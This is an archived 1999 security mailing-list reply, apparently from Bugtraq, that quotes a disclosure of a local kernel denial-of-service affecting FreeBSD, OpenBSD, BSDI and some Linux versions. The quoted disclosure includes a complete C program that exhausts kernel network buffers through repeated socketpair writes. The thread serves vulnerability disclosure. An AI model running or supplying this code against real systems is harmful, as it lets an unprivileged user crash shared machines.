Sven, I have verified the following platforms: BSDI 2.1 BSDI 3.1 BSDI 4.0 BSDI 4.0.1 Cobalt Linux (MIPS) - RedHat based All vulnerable. I am testing on other Linux platforms, but I presume all BSD and Linux-based systems are affected. I have no resources to test this on Solaris, AIX, HP and System-V based systems. I would venture a guess that MacOS X may be vulnerable since I am fairly sure that most of the socket code is lifted directly from BSD. JD On Wed, 1 Sep 1999, Sven Berkvens wrote: >Recently, I mailed this mailing to a number of people who are concerned >with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The >mailing was NOT intended to be made public, but somehow it was. Here is >my original mailing: > > >--- Forwarded --- > >I stumbled across a denial of service attack on FreeBSD systems, where >an unpriviledged user can panic the kernel. Quick and dirty testing >(code attached at the end of this mail) showed OpenBSD is vulnerable >too: > >FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to >test it on older FreeBSD versions. > >OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192: >The kernel logs one "/bsd: mb_map full" and all processes trying to send >something over the network get stuck waiting in mbuf. Locally the system >continues to function. Tested by a friend. > >NetBSD: Not available, but it is highly probable that the affected code >in OpenBSD is from its parent NetBSD. > >As far as I'm concerned, this can be handled quietly and without much >haste. Knowledge of this problem is limited and there is absolutely no >intention of publishing this exploit or messages to Bugtraq. > >With kind regards, >Sven Berkvens (svenat_private) >Long time FreeBSD-system administrator > > > >The source code for the program that causes this: > >#include <unistd.h> >#include <sys/socket.h> >#include <fcntl.h> > >#define BUFFERSIZE 204800 > >extern int >main(void) >{ > int p[2], i; > char crap[BUFFERSIZE]; > > while (1) > { > if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) > break; > i = BUFFERSIZE; > setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); > setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); > setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); > setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); > fcntl(p[0], F_SETFL, O_NONBLOCK); > fcntl(p[1], F_SETFL, O_NONBLOCK); > write(p[0], crap, BUFFERSIZE); > write(p[1], crap, BUFFERSIZE); > } > exit(0); >} > >----- End forwarded message ----- > =========================================== John N Dvorak | dvorakat_private Director of Technology CapuNet, LLC - Corporate Internet Solutions (301) 881-4900 x8018 ===========================================
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:01:49 PDT